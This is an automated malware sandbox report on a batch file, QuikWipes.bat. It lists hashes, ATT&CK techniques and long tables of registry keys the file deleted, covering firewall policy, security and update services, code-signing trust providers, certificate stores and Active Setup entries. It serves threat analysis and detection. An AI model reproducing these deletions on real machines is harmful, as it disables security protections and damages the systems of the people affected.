6d6c1778838f50e53bf5f2858df28d4f7e50c376c4018d7a7ce1036ff99730f2

General

Target

QuikWipes.bat
Size

47KB
MD5

4159f980bd03895ac2431f5264cbe0cf
SHA1

6b197f4f4ccf3f201c1ecc0ea145e79895acfb9f
SHA256

6d6c1778838f50e53bf5f2858df28d4f7e50c376c4018d7a7ce1036ff99730f2
SHA512

181bf22d9446b2904dfc2cd8c76f66a43b99650d7c2db180646f00126838ba0c58afc849572e65eb613ba7f37df58a17d3a85b4742a14b7bde0e7135a50af0d8
SSDEEP

192:a111111111111111111111111111111111111111111111111111111111111111:y

Score

10^/10

adware evasion persistence spyware stealer

Malware Config

Signatures

Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad	reg.exe

Modifies firewall policy service 2 TTPs 16 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedInterfaces	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedInterfaces\IfIso	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\Mdm	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\Logging	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Logging	reg.exe

Modifies security service 2 TTPs 8 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

Manipulates Digital Signatures 1 TTPs 64 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptsvcDllCtrl	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{189A3842-3041-11D1-85E1-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{31D1ADC1-D329-11D1-8ED8-0080C76516C6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{31D1ADC1-D329-11D1-8ED8-0080C76516C6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\AggregateSSLHandshakeTime	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.4	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2009	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2012	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{06C9E010-38CE-11D4-A2A3-00104BD35090}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2005	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedDevices	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\SystemCertificates\TrustedPublisher\Certificates	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2006	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.3	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2001	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2012	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCTLUsage\DEFAULT	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllProtectedRootMessageBox	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2005	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2221	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.1.1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.12	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{000C10F1-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AABA-8E78-11D0-8C47-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.25	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.12	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{64B9D180-8DA2-11CF-8736-00AA00A485EB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\Default	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.28	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\CTLs	reg.exe

Modifies Installed Components in the registry 2 TTPs 50 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{25FFAAD0-F4A3-4164-95FF-4461E9F35D51}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{de5aed00-a4bf-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{23A20C3C-2ADD-4A80-AFB4-C146F8847D79}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{FEBEF00C-046D-438D-8A88-BF94A6C9E703}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5A604D2C-E968-429B-8327-62B5CE52126D}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{A6EADE66-0000-0000-484E-7E8A45000000}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8F5D9E08-71EC-370E-BA96-36E6EF916DF2}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{45ea75a0-a269-11d1-b5bf-0000f8051515}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{9381D8F2-0288-11D0-9501-00AA00B911A5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{CE4BC71D-A88B-4943-BB3D-AF9C0E7D4387}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{4f645220-306d-11d2-995d-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{5fd399c0-a70a-11d1-9948-00c04f98bbc9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{990CB269-A600-38D0-B7D1-FBD392495F13}	reg.exe

Registers new Print Monitor 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Ports	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint\OfflinePorts	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon\Ports	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\IPP	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters\WSPrint	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\Adapters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port	reg.exe

Sets file execution options in registry 2 TTPs 47 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoadfsb.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoxmled.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordconv.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieUnatt.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excelcnv.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ie4uinit.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msqry32.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ngen.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PresentationHost.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\splwow64.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clview.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msosync.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\selfcert.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SystemSettings.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoasb.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excel.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\graph.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ielowutil.exe	reg.exe
